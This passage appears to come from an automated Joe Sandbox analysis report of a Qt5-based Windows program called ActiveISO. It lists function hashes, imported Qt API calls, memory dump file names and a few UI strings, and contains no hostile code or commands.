                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharCommandLineMultiWide$ArgvFreeLocal
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4060259846-0
                                                                                                                  • Opcode ID: 35e78bb3111ddc8aad4b34cf57eab76451faf744c30b442a5af617de0ecb0d19
                                                                                                                  • Instruction ID: a36ec2121f431d7a022ea17cb0be8196234f73ce7cf3f302edc3231d497fe705
                                                                                                                  • Opcode Fuzzy Hash: 35e78bb3111ddc8aad4b34cf57eab76451faf744c30b442a5af617de0ecb0d19
                                                                                                                  • Instruction Fuzzy Hash: B6417532A1878186D710DF12B85516A77A5FB86BE0F184235EF9DA3B94DF3CD450C704
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2580228974-0
                                                                                                                  • Opcode ID: e134a6bc14bd4aa0ca5bbd9b8ed1fe2928155c1979839ad43740ac36a4a8ca2c
                                                                                                                  • Instruction ID: 11b314132058e1c7a1599818d67efcb54b5571e9beee79480002cb841a6878dc
                                                                                                                  • Opcode Fuzzy Hash: e134a6bc14bd4aa0ca5bbd9b8ed1fe2928155c1979839ad43740ac36a4a8ca2c
                                                                                                                  • Instruction Fuzzy Hash: 22311072F14B8189EA10DE16E8561AD62A6EB48FD0F5C8031DF1DABB89DF38E141C304
                                                                                                                  APIs
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,00007FF65374466D), ref: 00007FF653745415
                                                                                                                  • ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,?,00007FF65374466D), ref: 00007FF65374542D
                                                                                                                  • ?data@QByteArray@@QEAAPEADXZ.QT5CORE(?,?,?,?,?,00007FF65374466D), ref: 00007FF653745437
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65374466D), ref: 00007FF653745451
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,00007FF65374466D), ref: 00007FF6537454B5
                                                                                                                    • Part of subcall function 00007FF6537431E0: ??9QString@@QEBA_NPEBD@Z.QT5CORE ref: 00007FF653743216
                                                                                                                    • Part of subcall function 00007FF6537431E0: ?toLatin1@QString@@QEGBA?AVQByteArray@@XZ.QT5CORE ref: 00007FF653743230
                                                                                                                    • Part of subcall function 00007FF6537431E0: ?data@QByteArray@@QEAAPEADXZ.QT5CORE ref: 00007FF65374323A
                                                                                                                    • Part of subcall function 00007FF6537431E0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653743255
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Array@@Byte$String@@$?data@Latin1@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 11479020-0
                                                                                                                  • Opcode ID: d9b675e21639299ac5e46f9fbb8779833486b6c5ec2e9f90661575392aec418e
                                                                                                                  • Instruction ID: 0db47f339df8191cef061fc8a871210aa76e24a8e0bdfe5d935b35371db36814
                                                                                                                  • Opcode Fuzzy Hash: d9b675e21639299ac5e46f9fbb8779833486b6c5ec2e9f90661575392aec418e
                                                                                                                  • Instruction Fuzzy Hash: EC217121E2854292EA00DB65E4524BA6363FF91F60F4C4231D69EFB6A5EF6CF505C708
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@String@@$?dispose@ExceptionThrow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1360683648-0
                                                                                                                  • Opcode ID: cc3dcea6ff83337f0d6b353bedd035c0bd8832dbe925bce318456ca50dbe15ea
                                                                                                                  • Instruction ID: f793f225cb942536c1b2baa8fdef82fdd5814e30ef2abe385f6c8fe6579b13b7
                                                                                                                  • Opcode Fuzzy Hash: cc3dcea6ff83337f0d6b353bedd035c0bd8832dbe925bce318456ca50dbe15ea
                                                                                                                  • Instruction Fuzzy Hash: 6D016272E14B4189EB04DF7299921BC2366EB49FD8F084130EE1EA7B55DF28D055C784
                                                                                                                  APIs
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141C7
                                                                                                                  • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141D5
                                                                                                                  • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141E6
                                                                                                                  • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF6537141F2
                                                                                                                  • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,?,00007FF653713A6D), ref: 00007FF653714226
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Data@@List$?begin@$?detach@?dispose@?end@Data@1@Data@1@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3079853071-0
                                                                                                                  • Opcode ID: 99f2c24cf32169c30ff8a10c844f682330edb13d51e816356da6b892f395b3b9
                                                                                                                  • Instruction ID: 41308f9f83bbb6ce8d93ce9ed1569f11bc082e4a3fcd202582e8690f18db70cf
                                                                                                                  • Opcode Fuzzy Hash: 99f2c24cf32169c30ff8a10c844f682330edb13d51e816356da6b892f395b3b9
                                                                                                                  • Instruction Fuzzy Hash: D601D431E1960142F6405BA7B845529A3A1EB89FE5B084130DE1DF3790DF3CD4938B08
                                                                                                                  APIs
                                                                                                                  • ?stop@QTimer@@QEAAXXZ.QT5CORE(?,?,00000000,00007FF65371A0DD,?,?,?,?,00000000,00007FF653719038), ref: 00007FF65373BB8C
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,00000000,00007FF65371A0DD,?,?,?,?,00000000,00007FF653719038), ref: 00007FF65373BBA1
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,00000000,00007FF65371A0DD,?,?,?,?,00000000,00007FF653719038), ref: 00007FF65373BBAE
                                                                                                                  • ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,00000000,00007FF65371A0DD,?,?,?,?,00000000,00007FF653719038), ref: 00007FF65373BBD3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FF65371A0DD,?,?,?,?,00000000,00007FF653719038), ref: 00007FF65373BBDD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ?setString@@String@@@$?stop@Label@@Text@Timer@@Title@V0@@Widget@@Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 761859232-0
                                                                                                                  • Opcode ID: a50ff6b03ebaecc48ba32d9c169ff2d447c6f784f34184ce20f1c7848e23b253
                                                                                                                  • Instruction ID: c38e49562e07727b26f0827e94c1b7fed62d0a0037107275315abe9d98c553e2
                                                                                                                  • Opcode Fuzzy Hash: a50ff6b03ebaecc48ba32d9c169ff2d447c6f784f34184ce20f1c7848e23b253
                                                                                                                  • Instruction Fuzzy Hash: F4111836A14B41C2EB04CF26E98512D7362FB89FD9B189031DA4EA3B64CF3CD0A5C784
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?dispose@Data@1@@Data@@ListThread@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1685146877-0
                                                                                                                  • Opcode ID: 54eedc664073e97ca093aca4fa22a2100fd5a13f434969ebc0f70ff54ff2485b
                                                                                                                  • Instruction ID: df56c8a29a78964dbf03948de9103a78f750e4b701e62cff5f73bfd41984fd24
                                                                                                                  • Opcode Fuzzy Hash: 54eedc664073e97ca093aca4fa22a2100fd5a13f434969ebc0f70ff54ff2485b
                                                                                                                  • Instruction Fuzzy Hash: 1C117032A14A4286EB409F29D8A63783362FF85F54F5D4231D92EE72A4DF3CD845C344
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?trimmed@Array@@ByteLower@V0@$$V0@@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2143416075-0
                                                                                                                  • Opcode ID: a9f400d22617fab1c60a561ad5f86c064021cc6f994b99d87bce53b088b46100
                                                                                                                  • Instruction ID: 8e744cd4d75d41f5c673ed38c0322cf8289780fdd5b8e83c7d05da38eeab9961
                                                                                                                  • Opcode Fuzzy Hash: a9f400d22617fab1c60a561ad5f86c064021cc6f994b99d87bce53b088b46100
                                                                                                                  • Instruction Fuzzy Hash: 4FE03061A28A4292EA009BA0F84A069A321FB85FB1B481330D97FA67F4DF6CD14DC744
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653727B86
                                                                                                                  • ?question@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF653727BAA
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653727BB7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageStandardString@@$?from?question@ArrayAscii_helper@Box@@Box@@@@Button@Button@1@Data@Flags@String@@1TypedW421@@Widget@@
                                                                                                                  • String ID: Extarcting
                                                                                                                  • API String ID: 1091540839-3325217157
                                                                                                                  • Opcode ID: c423c57cc976df09bb368db686371a84ee6c7b1e730103b3b55e4c46a0ad1c06
                                                                                                                  • Instruction ID: 20ca163a8c692a22b4d23137137c67902c4f116ebeadaacbe745078f73a25066
                                                                                                                  • Opcode Fuzzy Hash: c423c57cc976df09bb368db686371a84ee6c7b1e730103b3b55e4c46a0ad1c06
                                                                                                                  • Instruction Fuzzy Hash: 95114932E18BC586EB108F25E98536D67A6F784F84F190032EA4DA77A5CF7CD485CB48
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653727C66
                                                                                                                  • ?question@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF653727C8A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653727C97
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageStandardString@@$?from?question@ArrayAscii_helper@Box@@Box@@@@Button@Button@1@Data@Flags@String@@1TypedW421@@Widget@@
                                                                                                                  • String ID: Extarcting
                                                                                                                  • API String ID: 1091540839-3325217157
                                                                                                                  • Opcode ID: 903407a9eb45d3fd4e1f8954922be76cb09e517445467f1cc5a0653b8a440ad6
                                                                                                                  • Instruction ID: 4926e171c26b4b6fe2fa434754f3201df68eb06d23955a351ef019a5b6089aa4
                                                                                                                  • Opcode Fuzzy Hash: 903407a9eb45d3fd4e1f8954922be76cb09e517445467f1cc5a0653b8a440ad6
                                                                                                                  • Instruction Fuzzy Hash: 14112A32E18BC186EB108F21E98536D67A6F784F84F194032EA4DA7BA5CF7CD485C748
                                                                                                                  APIs
                                                                                                                  • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FF653752D55
                                                                                                                  • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FF653752D91
                                                                                                                  • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FF653752D9E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@NormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                  • String ID: QNetworkReply::NetworkError
                                                                                                                  • API String ID: 1134406281-3170863873
                                                                                                                  • Opcode ID: 0dc5e6d0bddc2de96924fc26475fa1cdf21efe84b49fc56cc8dd9342a55d67e0
                                                                                                                  • Instruction ID: 744a140a744b1358f0c9dd49ef5a62f843f132a2b90165b83159dfa1d5b28582
                                                                                                                  • Opcode Fuzzy Hash: 0dc5e6d0bddc2de96924fc26475fa1cdf21efe84b49fc56cc8dd9342a55d67e0
                                                                                                                  • Instruction Fuzzy Hash: 87018F71E28B4682E7108B64FC411A57361FB44B74F440231D56DF76A4DF7CD509C748
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653725891
                                                                                                                  • ?critical@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF6537258B5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537258C1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageStandardString@@$?critical@?fromArrayAscii_helper@Box@@Box@@@@Button@Button@1@Data@Flags@String@@1TypedW421@@Widget@@
                                                                                                                  • String ID: Error
                                                                                                                  • API String ID: 3030534136-2619118453
                                                                                                                  • Opcode ID: 9f16dd75756afddebd2f3dcdd84a0542becab5363ac9c0dbf70ac5faec03c58b
                                                                                                                  • Instruction ID: 23b4ee027978dc22cb3b72288ad26bc364a42abb37feb0272e42d2ffe927af52
                                                                                                                  • Opcode Fuzzy Hash: 9f16dd75756afddebd2f3dcdd84a0542becab5363ac9c0dbf70ac5faec03c58b
                                                                                                                  • Instruction Fuzzy Hash: 03F01D72A18B8086E700CB51F84526AA761FB99FC4F590031EF9DA7B69DF7CD504C784
                                                                                                                  APIs
                                                                                                                  • ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537222E4), ref: 00007FF653736C49
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537222E4), ref: 00007FF653736C5D
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE(?,?,1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int),00007FF6537222E4), ref: 00007FF653736C67
                                                                                                                  Strings
                                                                                                                  • 1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int), xrefs: 00007FF653736C40
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Object@@@Thread@@
                                                                                                                  • String ID: 1loadItemToFileTreeFinished(QTreeWidgetItem*, int, int)
                                                                                                                  • API String ID: 3926244378-1883380121
                                                                                                                  • Opcode ID: 08b96964ebe6444981fa9f69751d08eb38885b1729dcb53f9bd90c2116223830
                                                                                                                  • Instruction ID: e8e8d2956070990c05a9345426d821d6e31c7e73030157ef6908076eebca11bd
                                                                                                                  • Opcode Fuzzy Hash: 08b96964ebe6444981fa9f69751d08eb38885b1729dcb53f9bd90c2116223830
                                                                                                                  • Instruction Fuzzy Hash: 26F06232915F46CAEB548F74E88665833E9FB19F08F580134CA8D96318EF39D5A9C394
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
